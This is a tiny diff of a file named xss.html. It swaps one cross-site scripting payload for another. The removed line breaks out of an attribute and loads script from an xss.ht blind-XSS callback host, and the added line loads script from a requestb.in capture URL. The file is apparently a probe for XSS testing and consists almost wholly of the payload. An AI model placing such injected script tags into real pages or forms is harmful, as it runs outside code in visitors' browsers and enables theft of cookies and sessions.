--- a/xss.html
+++ b/xss.html
@@ -2,6 +2,7 @@
 <head>
 </head>
   <body>
-    "><script src=https://hrjhello.xss.ht></script>
+    "><script src="http://requestb.in/15rrpyd1"></script>
+    
   </body>
 </html>
